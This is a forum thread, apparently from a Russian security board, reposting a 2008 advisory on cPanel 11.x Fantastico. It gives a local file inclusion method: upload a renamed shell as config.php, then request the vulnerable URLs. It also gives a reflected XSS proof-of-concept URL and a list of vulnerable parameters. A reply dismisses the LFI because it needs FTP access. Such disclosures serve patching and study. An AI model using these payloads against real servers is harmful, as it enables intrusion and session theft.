cpanel 11.x XSS / Local File Inclusion Vulnerability

Discussion in 'Уязвимости' started by cash$$$, 31 Oct 2008.

  1. cash$$$

    cash$$$ Banned

    Joined:
    6 Jan 2008
    Messages:
    385
    Likes Received:
    246
    Reputations:
    10
    ----------------------------------------------------------------

    Script : Cpanel 11.x

    Type : Local File Inclusion & Cross Site Scripting

    Risk : High

    ----------------------------------------------------------------

    Discovered by : Khashayar Fereidani

    **** I am 17 Years Old ****

    My Official Website : HTTP://FEREIDANI.IR

    Team Website : Http://IRCRASH.COM

    Team Members : Khashayar Fereidani - Hadi Kiamarsi - Sina YazdanMehr

    Khashayar Fereidani Email : irancrash [ a t ] gmail [ d o t ] com

    ----------------------------------------------------------------

    Local File Inclusion Vulnerability :

    Note : Rename your shell to config.php and upload with your ftp account in ./ directory .... , now login in cpanel and
    enter vulnerable address in url ....


    https://ServerIp:2083/frontend/x3/fantastico/autoinstall4imagesgalleryupgrade.php?action=GoAhead&scriptpath_show=/home/[youruser]/

    https://ServerIp:2083/frontend/x2/fantastico/autoinstall4imagesgalleryupgrade.php?action=GoAhead&scriptpath_show=/home/[youruser]/

    https://ServerIp:2083/frontend/x/fantastico/autoinstall4imagesgalleryupgrade.php?action=GoAhead&scriptpath_show=/home/[youruser]/

    ----------------------------------------------------------------

    Cross site scripting :

    File Address : frontend/x3/fantastico/autoinstall4imagesgalleryupgrade.php?action=Upgrade%20to%201.7.4

    Set Action as Upgrade%20to%201.7.4

    Vulnerable Variables :

    $localapp
    $updatedir
    $scriptpath_show
    $domain_show
    $thispage
    $thisapp
    $currentversion

    For Example : https://ServerIp:2083/frontend/x3/fantastico/autoinstall4imagesgalleryupgrade.php?action=Upgrade%20to%201.7.4&localapp=%22%3Cscript%3Ealert(%27xss%27)%3C/script%3E


    ----------------------------------------------------------------

    Tnx : God

    HTTP://IRCRASH.COM HTTP://FEREIDANI.IR

    ----------------------------------------------------------------
     
  2. 1ten0.0net1

    1ten0.0net1 Time out

    Joined:
    28 Nov 2005
    Messages:
    473
    Likes Received:
    330
    Reputations:
    389
    . Имея FTP доступ заливать php файл для локального инклуда - это, конечно, тру-хак. =/
     
    #2 1ten0.0net1, 2 Nov 2008
    Last edited: 2 Nov 2008